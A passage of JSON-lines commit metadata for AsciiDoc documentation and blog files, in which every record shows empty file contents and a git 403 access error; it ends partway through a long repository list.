2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b8cd5244bddb3e12626fca26bb1608430702d11","subject":"add clojure survey 2019 post","message":"add clojure survey 
2019 post\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2019\/02\/04\/state-of-clojure-2019.adoc","new_file":"content\/news\/2019\/02\/04\/state-of-clojure-2019.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"815c56b6770cb9a4b1a58dd831655cd312df09b6","subject":"Fix an inaccuracy in the dynamic templates documentation. (#32890)","message":"Fix an inaccuracy in the dynamic templates documentation. (#32890)\n\n","repos":"scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/reference\/mapping\/dynamic\/templates.asciidoc","new_file":"docs\/reference\/mapping\/dynamic\/templates.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57527d179d1adbb0cb355708d8b052b8d09725cc","subject":"started documenting the internals of portal implementation","message":"started documenting the internals of portal implementation\n\nChange-Id: If19a487ac128606dde8531daa8e529af3c17d602\n","repos":"8l\/connectal,hanw\/connectal,cambridgehackers\/connectal,csail-csg\/connectal,hanw\/connectal,csail-csg\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,8l\/connectal,hanw\/connectal,chenm001\/connectal,csail-csg\/connectal,chenm001\/connectal,chenm001\/connectal,chenm001\/connectal,hanw\/connectal,cambridgehackers\/connectal,8l\/connectal,cambridgehackers\/connectal,hanw\/connectal,8l\/connectal,8l\/connectal,cambridgehackers\/connectal,chenm001\/connectal,csail-csg\/connectal","old_file":"doc\/portalstructure.asciidoc","new_file":"doc\/portalstructure.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csail-csg\/connectal.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e06e6bcf11877664a9294333bdf62334bb9edd6e","subject":"[DOC] Fix typo","message":"[DOC] Fix 
typo\n","repos":"costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93edc7219b2818430c8b100377d27c719585b363","subject":"[DOC] Add section on push-down support for Spark 1.3+","message":"[DOC] Add section on push-down support for Spark 1.3+\n\nrelates #461\n","repos":"xjrk58\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8acf02fc754575b83b796ac77a2ae91adcbc7c3d","subject":"[DOC] Update push down section in Spark","message":"[DOC] Update push down section in Spark\n","repos":"girirajsharma\/elasticsearch-hadoop,puneetjaiswal\/elasticsearch-hadoop,pranavraman\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,kai5263499\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,huangll\/elasticsearch-hadoop,jasontedor\/elasticsearch-hadoop,sarwarbhuiyan\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,samkohli\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,aie108\/elasticsearch-hadoop,trifork\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/huangll\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd50ac00132d58e1097e0d84ffe46e6d307e8552","subject":"Deleted 2017-02-25adoc.adoc","message":"Deleted 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5263ee267cf2990adf80ed50b9b8dd9a0cc67857","subject":"SonarCloud to Maven: tree to blob","message":"SonarCloud to Maven: tree to blob\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/SonarCloud.adoc","new_file":"Dev 
tools\/SonarCloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6efe1e962eef4346ce31378b2a12c5bcf91dbed9","subject":"Alpha3 release blog.","message":"Alpha3 release blog.\n","repos":"stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org","old_file":"news\/2015-06-17-WildFly-Swarm-Alpha3-Released.adoc","new_file":"news\/2015-06-17-WildFly-Swarm-Alpha3-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93dceebefa186bf2ddd270a6ea27606327c6bdbf","subject":"y2b create post 3 Cool iPhone Gadgets!","message":"y2b create post 3 Cool iPhone Gadgets!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-25-3-Cool-iPhone-Gadgets.adoc","new_file":"_posts\/2016-08-25-3-Cool-iPhone-Gadgets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf2f6c72ca8bd9ce0ab105f6f6113d81b120c641","subject":"Update 2017-07-13-C-S-S-Rhythmic-Sizing.adoc","message":"Update 2017-07-13-C-S-S-Rhythmic-Sizing.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-07-13-C-S-S-Rhythmic-Sizing.adoc","new_file":"_posts\/2017-07-13-C-S-S-Rhythmic-Sizing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35d966bbd655facf353c2aa0a09b421cab23a1bc","subject":"y2b create post The Razor-Thin Convertible Laptop","message":"y2b create post The Razor-Thin Convertible Laptop","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-09-The-RazorThin-Convertible-Laptop.adoc","new_file":"_posts\/2017-01-09-The-RazorThin-Convertible-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dc2f79fba90668229f64a33a6804b98ee61fe95","subject":"Update 2017-01-27-Programing-Architecture-And-Math.adoc","message":"Update 
2017-01-27-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2017-01-27-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3de2a017cb7318ed0a58165ed4ef957dbcccc1d","subject":"Update 2016-12-01-Test.adoc","message":"Update 2016-12-01-Test.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Test.adoc","new_file":"_posts\/2016-12-01-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63416732f3ca9fe217a37053c28c4a60ca9eff38","subject":"Update 2018-10-21-O0-P.adoc","message":"Update 2018-10-21-O0-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-O0-P.adoc","new_file":"_posts\/2018-10-21-O0-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af6da602589c4330d15400c46c4b607393322f83","subject":"Reword fmap documentation","message":"Reword fmap documentation\n\nrefs #22\n","repos":"yurrriq\/cats,alesguzik\/cats,mccraigmccraig\/cats,tcsavage\/cats,funcool\/cats,OlegTheCat\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a42de61dc4cafbaae397498e5b78d8912a48daf7","subject":"Create CONTRIBUTING.adoc","message":"Create 
CONTRIBUTING.adoc","repos":"mrcouthy\/mrcouthy.github.io,fasigpt\/fasigpt.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,Zatttch\/zatttch.github.io,theblankpages\/theblankpages.github.io,angilent\/angilent.github.io,carsnwd\/carsnwd.github.io,kzmenet\/kzmenet.github.io,maurodx\/maurodx.github.io,peter-lawrey\/peter-lawrey.github.io,Mentaxification\/Mentaxification.github.io,patricekrakow\/patricekrakow.github.io,djmdata\/djmdata.github.io,eduardo76609\/eduardo76609.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,jblemee\/jblemee.github.io,IndianLibertarians\/indianlibertarians.github.io,MichaelIT\/MichaelIT.github.io,lovian\/lovian.github.io,dvbnrg\/dvbnrg.github.io,gongxiancao\/gongxiancao.github.io,sskorol\/sskorol.github.io,yahussain\/yahussain.github.io,14FRS851\/14FRS851.github.io,CreditCardsCom\/creditcardscom.github.io,jonathandmoore\/jonathandmoore.github.io,thockenb\/thockenb.github.io,topicusonderwijs\/topicusonderwijs.github.io,bithunshal\/shalsblog,netrunnerX\/netrunnerx.github.io,tosun-si\/tosun-si.github.io,remi-hernandez\/remi-hernandez.github.io,somosazucar\/centroslibres,jblemee\/jblemee.github.io,lerzegov\/lerzegov.github.io,xavierdono\/xavierdono.github.io,timyklam\/timyklam.github.io,reggert\/reggert.github.io,htapia\/htapia.github.io,Driven-Development\/Driven-Development.github.io,ahopkins\/amhopkins.com,anwfr\/blog.anw.fr,chbailly\/chbailly.github.io,plaidshirtguy\/plaidshirtguy.github.io,jkschneider\/jkschneider.github.io,heliomsolivas\/heliomsolivas.github.io,furcon\/furcon.github.io,datumrich\/datumrich.github.io,topranks\/topranks.github.io,jblemee\/jblemee.github.io,ennerf\/ennerf.github.io,HubPress\/hubpress.io,kzmenet\/kzmenet.github.io,buliaoyin\/buliaoyin.github.io,javathought\/javathought.github.io,Roen00\/roen00.github.io,bbsome\/bbsome.github.io,velo\/velo.github.io,drankush\/drankush.github.io,egorlitvinenko\/egorlitvinenko.github.io,netrunnerX\/netrunnerx.github.io,InformatiQ\/informatiq.github.io,txemis\/txemis.github.io,alimasyhur\/alimasyhur.github.io,hirako2000\/hirako2000.github.io,chaseey\/chaseey.github.io,mahrocks\/mahrocks.github.io,camilo28\/camilo28.github.io,mikealdo\/mikealdo.github.io,theofilis\/theofilis.github.io,OctavioMaia\/octaviomaia.github.io,dannylane\/dannylane.github.io,mager19\/mager19.github.io,demo-hubpress\/demo,icthieves\/icthieves.github.io,maurodx\/maurodx.github.io,FilipLaz\/filiplaz.github.io,TelfordLab\/telfordlab.github.io,soyabeen\/soyabeen.github.io,mattburnin\/hubpress.io,ricardozanini\/ricardozanini.github.io,2wce\/2wce.github.io,rushil-patel\/rushil-patel.github.io,lyqiangmny\/lyqiangmny.github.io,bitcowboy\/bitcowboy.github.io,alphaskade\/alphaskade.github.io,jbrizio\/jbrizio.github.io,siarlex\/siarlex.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,thrasos\/thrasos.github.io,InformatiQ\/informatiq.github.io,polarbill\/polarbill.github.io,johannewinwood\/johannewinwood.github.io,LearningTools\/LearningTools.github.io,darsto\/darsto.github.io,atfd\/hubpress.io,fuhrerscene\/fuhrerscene.github.io,iolabailey\/iolabailey.github.io,gongxiancao\/gongxiancao.github.io,xvin3t\/xvin3t.github.io,jborichevskiy\/jborichevskiy.github.io,deformat\/deformat.github.io,ElteHupkes\/eltehupkes.github.io,tedbergeron\/hubpress.io,justafool5\/justafool5.github.io,fbruch\/fbruch.github.com,bencekiraly\/bencekiraly.github.io,laposheureux\/laposheureux.github.io,s-f-ek971\/s-f-ek971.github.io,timyklam\/timyklam.github.io,roamarox\/roamarox.github.io,apalkoff\/apalkoff.github.io,itsallanillusio
n\/itsallanillusion.github.io,sinemaga\/sinemaga.github.io,live-smart\/live-smart.github.io,OctavioMaia\/octaviomaia.github.io,3991\/3991.github.io,zubrx\/zubrx.github.io,pdudits\/pdudits.github.io,ennerf\/ennerf.github.io,crisgoncalves\/crisgoncalves.github.io,indusbox\/indusbox.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,endymion64\/endymion64.github.io,ntfnd\/ntfnd.github.io,livehua\/livehua.github.io,IdoramNaed\/idoramnaed.github.io,debbiezhu\/debbiezhu.github.io,vba\/vba.github.io,Zatttch\/zatttch.github.io,holtalanm\/holtalanm.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,metasean\/blog,IndianLibertarians\/indianlibertarians.github.io,camilo28\/camilo28.github.io,Brzhk\/Brzhk.github.io,SRTjiawei\/SRTjiawei.github.io,realraindust\/realraindust.github.io,bencekiraly\/bencekiraly.github.io,joescharf\/joescharf.github.io,MartinAhrer\/martinahrer.github.io,blahcadepodcast\/blahcadepodcast.github.io,thrasos\/thrasos.github.io,zhuo2015\/zhuo2015.github.io,jcsirot\/hubpress.io,Bulletninja\/bulletninja.github.io,angilent\/angilent.github.io,amodig\/amodig.github.io,hayyuelha\/technical-blog,hoernschen\/hoernschen.github.io,Easter-Egg\/Easter-Egg.github.io,carlosdelfino\/carlosdelfino-hubpress,dingboopt\/dingboopt.github.io,eduardo76609\/eduardo76609.github.io,CreditCardsCom\/creditcardscom.github.io,cringler\/cringler.github.io,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,DullestSaga\/dullestsaga.github.io,scottellis64\/scottellis64.github.io,macchandev\/macchandev.github.io,live-smart\/live-smart.github.io,macchandev\/macchandev.github.io,mahrocks\/mahrocks.github.io,tjfy1992\/tjfy1992.github.io,nickwanhere\/nickwanhere.github.io,chowwin\/chowwin.github.io,kfkelvinng\/kfkelvinng.github.io,dgrizzla\/dgrizzla.github.io,bretonio\/bretonio.github.io,MatanRubin\/MatanRubin.github.io,lmcro\/hubpress.io,roelvs\/roelvs.github.io,raghakot\/raghakot.github.io,alchemistcookbook\/alchemistcookbook.github.io,ovo-6\/ovo-6.github.io,gudhakesa\/gudhakesa.github.io,christianmtr\/christianmtr.github.io,deruelle\/deruelle.github.io,Easter-Egg\/Easter-Egg.github.io,neomobil\/neomobil.github.io,BulutKAYA\/bulutkaya.github.io,yuyudhan\/yuyudhan.github.io,uskithub\/uskithub.github.io,blayhem\/blayhem.github.io,costalfy\/costalfy.github.io,arthurmolina\/arthurmolina.github.io,innovation-jp\/innovation-jp.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,mnishihan\/mnishihan.github.io,xavierdono\/xavierdono.github.io,xvin3t\/xvin3t.github.io,javathought\/javathought.github.io,elidiazgt\/mind,ilyaeck\/ilyaeck.github.io,tamakinkun\/tamakinkun.github.io,gorjason\/gorjason.github.io,wiibaa\/wiibaa.github.io,carlosdominguezmartin\/carlosdominguezmartin.github.io,triskell\/triskell.github.io,xumr0x\/xumr0x.github.io,pyxozjhi\/pyxozjhi.github.io,psicrest\/psicrest.github.io,macchandev\/macchandev.github.io,sgalles\/sgalles.github.io,jarbro\/jarbro.github.io,iwakuralai-n\/badgame-site,puzzles-engineer\/puzzles-engineer.github.io,rdspring1\/rdspring1.github.io,crotel\/crotel.github.com,backemulus\/backemulus.github.io,ronanki\/ronanki.github.io,oldkoyot\/oldkoyot.github.io,birvajoshi\/birvajoshi.github.io,raloliver\/raloliver.github.io,raisedadead\/hubpress.io,ecommandeur\/ecommandeur.github.io,thezorgan\/thezorgan.github.io,alexbleasdale\/alexbleasdale.github.io,datumrich\/datumrich.github.io,Zatttch\/zatttch.github.io,xvin3t\/xvin3t.github.io,vendanoapp\/vendanoapp.github.io,anshu92\/blog,ciekawy\/ciekawy.github.io,grzrobak\/grzrobak.github.io,chrizco\/chrizco.github.io
,vs4vijay\/vs4vijay.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,YannDanthu\/YannDanthu.github.io,hutchr\/hutchr.github.io,reggert\/reggert.github.io,bluenergy\/bluenergy.github.io,iveskins\/iveskins.github.io,puzzles-engineer\/puzzles-engineer.github.io,kimkha-blog\/kimkha-blog.github.io,jkschneider\/jkschneider.github.io,Asastry1\/inflect-blog,kai-cn\/kai-cn.github.io,eunas\/eunas.github.io,nnn-dev\/nnn-dev.github.io,mattpearson\/mattpearson.github.io,Imran31\/imran31.github.io,StefanBertels\/stefanbertels.github.io,neuni\/neuni.github.io,endymion64\/endymion64.github.io,olivierbellone\/olivierbellone.github.io,thomaszahr\/thomaszahr.github.io,neuni\/neuni.github.io,kimkha-blog\/kimkha-blog.github.io,locnh\/locnh.github.io,in2erval\/in2erval.github.io,hitamutable\/hitamutable.github.io,KozytyPress\/kozytypress.github.io,tkountis\/tkountis.github.io,tedroeloffzen\/tedroeloffzen.github.io,sfoubert\/sfoubert.github.io,thykka\/thykka.github.io,jrhea\/jrhea.github.io,heliomsolivas\/heliomsolivas.github.io,joescharf\/joescharf.github.io,skeate\/skeate.github.io,mrcouthy\/mrcouthy.github.io,joaquinlpereyra\/joaquinlpereyra.github.io,markfetherolf\/markfetherolf.github.io,amuhle\/amuhle.github.io,pallewela\/pallewela.github.io,qeist\/qeist.github.io,olivierbellone\/olivierbellone.github.io,dannylane\/dannylane.github.io,anwfr\/blog.anw.fr,al1enSuu\/al1enSuu.github.io,osada9000\/osada9000.github.io,psicrest\/psicrest.github.io,hirako2000\/hirako2000.github.io,al1enSuu\/al1enSuu.github.io,blahcadepodcast\/blahcadepodcast.github.io,ashelle\/ashelle.github.io,Nekothrace\/nekothrace.github.io,crotel\/crotel.github.com,al1enSuu\/al1enSuu.github.io,akr-optimus\/akr-optimus.github.io,miroque\/shirokuma,sgalles\/sgalles.github.io,unay-cilamega\/unay-cilamega.github.io,minicz\/minicz.github.io,gardenias\/sddb.com,stratdi\/stratdi.github.io,tcollignon\/tcollignon.github.io,kosssi\/blog,demo-hubpress\/demo,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,hinaloe\/hubpress,rushil-patel\/rushil-patel.github.io,zakkum42\/zakkum42.github.io,christianmtr\/christianmtr.github.io,kosssi\/blog,BulutKAYA\/bulutkaya.github.io,kubevirt\/blog,wattsap\/wattsap.github.io,tosun-si\/tosun-si.github.io,jmelfi\/jmelfi.github.io,pokev25\/pokev25.github.io,jtsiros\/jtsiros.github.io,pysaumont\/pysaumont.github.io,faldah\/faldah.github.io,mkhymohamed\/mkhymohamed.github.io,jaredmorgs\/jaredmorgs.github.io,dingboopt\/dingboopt.github.io,wattsap\/wattsap.github.io,tkountis\/tkountis.github.io,vendanoapp\/vendanoapp.github.io,izziiyt\/izziiyt.github.io,chowwin\/chowwin.github.io,skeate\/skeate.github.io,somosazucar\/centroslibres,3991\/3991.github.io,emtudo\/emtudo.github.io,alick01\/alick01.github.io,Mentaxification\/Mentaxification.github.io,dgrizzla\/dgrizzla.github.io,holtalanm\/holtalanm.github.io,willnewby\/willnewby.github.io,FilipLaz\/filiplaz.github.io,TsungmingLiu\/tsungmingliu.github.io,TunnyTraffic\/gh-hosting,FilipLaz\/filiplaz.github.io,realraindust\/realraindust.github.io,heliomsolivas\/heliomsolivas.github.io,mattpearson\/mattpearson.github.io,live-smart\/live-smart.github.io,RandomWebCrap\/randomwebcrap.github.io,raytong82\/raytong82.github.io,codechunks\/codechunks.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,fadlee\/fadlee.github.io,livehua\/livehua.github.io,iwangkai\/iwangkai.github.io,zubrx\/zubrx.github.io,jarcane\/jarcane.github.io,carlosdelfino\/carlosdelfino-hubpress,yaks-all-the-way-down\/yaks-all-the-way-down.github.io,amodig\/amodig.github.io,flug\/flug.git
hub.io,itsashis4u\/hubpress.io,thezorgan\/thezorgan.github.io,topranks\/topranks.github.io,neocarvajal\/neocarvajal.github.io,Tekl\/tekl.github.io,tedbergeron\/hubpress.io,Kif11\/Kif11.github.io,in2erval\/in2erval.github.io,juliosueiras\/juliosueiras.github.io,2wce\/2wce.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,mrcouthy\/mrcouthy.github.io,dvmoomoodv\/hubpress.io,bitcowboy\/bitcowboy.github.io,netrunnerX\/netrunnerx.github.io,velo\/velo.github.io,somosazucar\/centroslibres,rballan\/rballan.github.io,theblankpages\/theblankpages.github.io,pzmarzly\/g2zory,diogoan\/diogoan.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,cloudmind7\/cloudmind7.github.com,scholzi94\/scholzi94.github.io,johannewinwood\/johannewinwood.github.io,Andy4Craft\/andy4craft.github.io,wols\/time,cmolitor\/blog,Vanilla-Java\/vanilla-java.github.io,jbutzprojects\/jbutzprojects.github.io,Vanilla-Java\/vanilla-java.github.io,nickwanhere\/nickwanhere.github.io,JithinPavithran\/JithinPavithran.github.io,s-f-ek971\/s-f-ek971.github.io,pdudits\/pdudits.github.io,JithinPavithran\/JithinPavithran.github.io,lxjk\/lxjk.github.io,Dhuck\/dhuck.github.io,lmcro\/hubpress.io,arthurmolina\/arthurmolina.github.io,Driven-Development\/Driven-Development.github.io,wols\/time,roelvs\/roelvs.github.io,ecmeyva\/ecmeyva.github.io,nicolasmaurice\/nicolasmaurice.github.io,carsnwd\/carsnwd.github.io,ElteHupkes\/eltehupkes.github.io,triskell\/triskell.github.io,wols\/time,miroque\/shirokuma,harvard-visionlab\/harvard-visionlab.github.io,Driven-Development\/Driven-Development.github.io,sidmusa\/sidmusa.github.io,Aerodactyl\/aerodactyl.github.io,kzmenet\/kzmenet.github.io,roelvs\/roelvs.github.io,Adyrhan\/adyrhan.github.io,DominikVogel\/DominikVogel.github.io,fbruch\/fbruch.github.com,thefreequest\/thefreequest.github.io,zestyroxy\/zestyroxy.github.io,apalkoff\/apalkoff.github.io,mmhchan\/mmhchan.github.io,scholzi94\/scholzi94.github.io,iolabailey\/iolabailey.github.io,ricardozanini\/ricardozanini.github.io,LearningTools\/LearningTools.github.io,xumr0x\/xumr0x.github.io,mdramos\/mdramos.github.io,iveskins\/iveskins.github.io,darsto\/darsto.github.io,deunz\/deunz.github.io,darsto\/darsto.github.io,olavloite\/olavloite.github.io,PierreBtz\/pierrebtz.github.io,zakkum42\/zakkum42.github.io,emtudo\/emtudo.github.io,harvard-visionlab\/harvard-visionlab.github.io,qu85101522\/qu85101522.github.io,joelcbailey\/joelcbailey.github.io,twentyTwo\/twentyTwo.github.io,olivierbellone\/olivierbellone.github.io,alick01\/alick01.github.io,roamarox\/roamarox.github.io,elidiazgt\/mind,ntfnd\/ntfnd.github.io,acristyy\/acristyy.github.io,rdspring1\/rdspring1.github.io,rdspring1\/rdspring1.github.io,tedroeloffzen\/tedroeloffzen.github.io,jrhea\/jrhea.github.io,acristyy\/acristyy.github.io,grzrobak\/grzrobak.github.io,fadlee\/fadlee.github.io,raditv\/raditv.github.io,fbruch\/fbruch.github.com,miroque\/shirokuma,crotel\/crotel.github.com,gorjason\/gorjason.github.io,mdramos\/mdramos.github.io,tcollignon\/tcollignon.github.io,furcon\/furcon.github.io,mozillahonduras\/mozillahonduras.github.io,seatones\/seatones.github.io,unay-cilamega\/unay-cilamega.github.io,kunicmarko20\/kunicmarko20.github.io,thezorgan\/thezorgan.github.io,kreids\/kreids.github.io,pwlprg\/pwlprg.github.io,noahrc\/noahrc.github.io,seatones\/seatones.github.io,crisgoncalves\/crisgoncalves.github.io,mkhymohamed\/mkhymohamed.github.io,mnishihan\/mnishihan.github.io,amodig\/amodig.github.io,fqure\/fqure.github.io,timelf123\/timelf123.github.io,introspectively\/introspectively.github.io,l
